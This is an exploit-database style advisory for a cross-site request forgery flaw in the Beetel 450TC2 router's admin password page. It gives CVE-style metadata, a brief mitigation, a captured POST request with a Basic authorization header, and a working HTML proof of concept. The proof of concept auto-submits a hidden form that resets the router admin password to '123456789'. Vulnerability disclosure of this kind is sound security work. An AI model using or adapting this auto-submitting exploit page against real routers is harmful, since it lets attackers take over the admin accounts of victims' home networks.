Beetel 450TC2 Router Admin Password Cross Site Request Forgery Vulnerability

vendor:

450TC2

by:

shyamkumar somana

7,5

CVSS

HIGH

Cross Site Request Forgery

352

CWE

Product Name: 450TC2

Affected Version From: 450TC2 - Firmware version : TX6-0Q-005_retail

Affected Version To: 450TC2 - Firmware version : TX6-0Q-005_retail

Patch Exists: NO

Related CWE: N/A

CPE: h:beetel:450tc2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 8

2014

Beetel 450TC2 Router Admin Password Cross Site Request Forgery Vulnerability

Beetel 450TC2 Router is vulnerable for cross site request forgery vulnerability in change password page. An attacker can exploit this vulnerability by sending a malicious POST request to the Forms/tools_admin_1 page with the new password in the request body. This will allow the attacker to change the router's admin password without authentication.

Mitigation:

The router should be configured to only accept authenticated requests to the Forms/tools_admin_1 page.

Source

Exploit-DB raw data:

<!--
# Exploit Title: Beetel 450TC2 Router Admin Password Cross Site Request
Forgery Vulnerability
# Date: 30/04/2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: www.beetel.in
# Version: 450TC2 - Firmware version : TX6-0Q-005_retail
# Tested on: Windows 8

#Beetel 450TC2 Router is vulnerable for cross site request forgery
vulnerability in change password page.
#Affected Resource/Form : Forms/tools_admin_1


###################################################################################

Post Request:

POST /Forms/tools_admin_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/maintenance/tools_admin.htm
Authorization: Basic YWRtaW46c3lhbXNvbWFuYQ==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

uiViewTools_Password=NEW_PASSWORD&uiViewTools_PasswordConfirm=NEW_PASSWORD

###################################################################################

#Exploit:
-->

<html>
  <body>
    <form action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
      <input type="hidden" name="uiViewTools_Password" value="123456789" />
      <input type="hidden" name="uiViewTools_PasswordConfirm" value="123456789" />
      <input type="submit" value="Submit form" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>